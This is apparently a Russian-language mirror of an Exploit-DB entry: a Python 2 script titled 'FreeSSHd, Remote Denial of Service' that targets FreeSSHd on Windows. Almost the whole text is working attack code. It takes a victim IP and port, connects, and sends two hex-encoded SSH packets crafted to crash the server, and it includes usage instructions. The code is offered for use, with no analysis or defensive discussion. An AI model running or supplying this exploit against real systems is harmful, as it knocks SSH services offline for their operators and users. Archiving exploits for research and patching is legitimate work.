- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 18268
- Проверка EDB
-
- Пройдено
- Автор
- LEVEL
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2011-12-24
Код:
import sys, socket, binascii
print "\n"
print "----------------------------------------------------------------"
print "| FreeSSHd, Remote Denial of Service |"
print "| Level, Smash the Stack |"
print "----------------------------------------------------------------"
print "\n"
buf = [
("5353482d322e302d50755454595f4b695454590d0a0000027c065a3db5f2230f6aed834d36a6fa8"
"55b1f140000009a6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d73686"
"13235362c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6"
"469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d6"
"16e2d67726f7570312d736861312c727361323034382d7368613235362c727361313032342d73686"
"1310000000f7373682d7273612c7373682d6473730000009f6165733235362d6374722c616573323"
"5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657331393"
"22d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d6362632c626"
"c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c336465732d636"
"2632c617263666f75723235362c617263666f75723132380000009f6165733235362d6374722c616"
"5733235362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657"
"33139322d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d63626"
"32c626c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c3364657"
"32d6362632c617263666f75723235362c617263666f75723132380000001f686d61632d736861312"
"c686d61632d736861312d39362c686d61632d6d64350000001f686d61632d736861312c686d61632"
"d736861312d39362c686d61632d6d6435000000096e6f6e652c7a6c6962000000096e6f6e652c7a6"
"c696200000000000000000000000000aac55b402546"),
("0000010c061e000001005e04d639ec531b5b8623f7ea733be6cc59d6439a40bbca110e1c2d45902"
"46cc2ef5deb76623f30c6181112c168ba4f1d253a6aebe45b6a5c496b59894233f4991c8969b68d4"
"3261e03d768dccda76f935f185b3168626d07a3c496cfb760e3fba82fd10dd309fec54a67bbbb294"
"5f316080d27768743c975d90728fc87b5b33774ed6e2ebf6106001d4f3342a8a83fd501b6b7cc7ac"
"e537f3bb83f2f0ff21af624f9353ab3e1ee2c5eebd9b5c36579656ad5a5fec779c88665abf1ced55"
"b8aa6272860e58c6c4482c1b83020e270487cf96b5cffffffff60534d770a69bcc1c71963827ba6e"
"3fb8a0c06f3bf64c3d426e67d00d90c679ee26388d2ef69f7357f9b2a688b4527")
]
def usage():
print "usage : ./freesshd.py <victim_ip> <victim_port>"
print "example: ./freesshd.py 192.168.1.22 22"
def main():
if len(sys.argv) != 3:
usage()
sys.exit()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = sys.argv[1]
PORT = int(sys.argv[2])
s.connect((HOST,PORT))
data = s.recv(1024)
print data
print "[*] Sending Payload...\n"
for i in range(0,len(buf)):
s.send(binascii.unhexlify(buf[i]))
print "[*] Closing Socket...\n"
s.close()
if __name__ == "__main__":
main()
- Источник
- www.exploit-db.com